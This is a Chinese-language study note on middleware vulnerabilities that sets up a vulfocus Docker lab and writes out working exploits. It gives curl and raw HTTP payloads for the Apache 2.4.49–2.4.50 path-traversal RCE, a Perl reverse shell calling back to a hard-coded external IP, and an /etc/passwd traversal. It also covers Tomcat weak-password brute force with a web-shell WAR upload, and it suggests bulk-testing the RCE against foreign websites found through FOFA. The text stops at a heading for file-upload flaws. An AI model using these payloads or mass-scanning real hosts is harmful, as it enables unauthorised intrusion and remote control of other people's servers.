中间件的安全问题

前言

了解常见的中间件 ： IIS 、 apache、nignx、tomcat

环境搭建中间件的安全问题主要就是实战以前发现的CVE漏洞

环境搭建 上个笔记有如何在kali进行搭建docker

准备kali   已经搭建了docker  

sudo docker pull vulfocus/vulfocus:latest 
拉取镜像

docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxxx vulfocus/vulfocus
启动镜像    run是运行   -d 在后台   -p 端口   -v是进行挂载  ： 后边是容器的路径   意思就是把容器的内容映射到本地机目录上    而  -e是设置容器的环境变量

注意这个 ip 0000 是你本机的ip

里面有个log

apache框架下有利于价值的CVE

1、RCE命令执行 

应用于apache  2.4.49-2.4.50

我们利用漏洞之前先找到这个漏洞的中间件的版本

正好是在这个版本的

利用exp进行操作

使用服务器进行curl请求
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'


抓包改包修改
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

利用exp进行操作

这个rce框架漏洞我们可以进行全网搜   先使用 fafoviewer生成使用fafo搜索的信息可以去批量的测试（这里测试的都是外国网站）

fofa语法：

这边只导出10个是因为我设置的最大导出  

2、目录穿越漏洞

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

可以直接访问

tomcat框架

1、弱口令爆破

这个就是利用tomcat登录弹窗的弱密码

之后需要getshell

骚操作： 冰蝎生成一个jar木马

和gzl有很明显的差别就是开头没有system

这里让我们上传的是  war文件

压缩一下改名为 war

http://192.168.248.132:11374/shell/shell.jsp

连接上就行

2、文件上传漏洞